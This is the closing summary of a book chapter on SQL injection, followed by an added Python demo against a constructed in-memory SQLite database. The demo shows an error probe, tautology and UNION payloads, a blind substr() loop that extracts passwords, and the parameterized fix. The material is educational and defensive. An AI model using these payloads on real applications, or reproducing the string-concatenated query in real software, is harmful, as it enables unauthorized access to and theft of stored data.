In this chapter, we learned about SQL injection vulnerabilities, how to detect them, and how to exploit them. We can conclude with the following points:
- SQL injection vulnerabilities occur when untrusted input is concatenated into the text of a SQL query instead of being passed as a bound parameter; input validation alone does not reliably prevent them.
- To identify a SQL injection bug, enter special characters (a single quote is the usual first probe) and look for a database error or other unexpected behavior in the response.
- There are three main types of SQL injection: in-band, inferential (blind), and out-of-band.
- You can use the Intruder and Comparer tools, included in Burp Suite, to automate SQL injection identification.
- Using sqlmap, it is possible to automate SQL injection exploitation.
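The points above, reproduced as an added, runnable example (this is not code from the book): a small lookup against an in-memory SQLite database, built vulnerable on purpose, with the single-quote detection probe, an in-band exploit (tautology and UNION), a blind boolean extraction loop, and the parameterized fix beside it. The table, the users and their passwords, and the function names are constructed for this illustration; the out-of-band type is not shown because it needs a network channel.

```python
"""Added example, not from the book: a deliberately vulnerable lookup
backed by an in-memory SQLite database (table and rows are constructed
for this illustration)."""

import sqlite3


def make_db():
    """Build the constructed sample database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, username):
    """Root cause: untrusted input is concatenated into the query text."""
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]


def safe_lookup(conn, username):
    """Fix: the value is bound as a parameter and never parsed as SQL."""
    return [
        row[0]
        for row in conn.execute(
            "SELECT username FROM users WHERE username = ?", (username,)
        )
    ]


def probe_for_error(conn, payload):
    """Detection step: a stray quote that breaks the query yields a DB error.
    Returns the error text, or None when the query ran cleanly."""
    try:
        vulnerable_lookup(conn, payload)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def blind_extract_password(conn, username, charset, max_len=16):
    """Inferential (blind) exploitation: only 'row matched / no row' is
    observable, so the password is recovered one character at a time with
    substr(); '-- ' comments out the closing quote of the original query."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = f"{username}' AND substr(password,{pos},1)='{ch}' -- "
            if vulnerable_lookup(conn, payload):
                recovered += ch
                break
        else:
            # No character matched: substr() returned '' past the end.
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("probe:", probe_for_error(db, "alice'"))
    print("in-band tautology:", vulnerable_lookup(db, "' OR '1'='1"))
    print("in-band UNION:", vulnerable_lookup(db, "' UNION SELECT password FROM users -- "))
    print("blind:", blind_extract_password(db, "alice", "abcdefghijklmnopqrstuvwxyz0123456789"))
    print("parameterized:", safe_lookup(db, "' OR '1'='1"))
```

The blind loop is the same boolean-based technique sqlmap automates; run it against `safe_lookup` instead and every payload simply fails to match a username, which is the behavior the parameterized query guarantees.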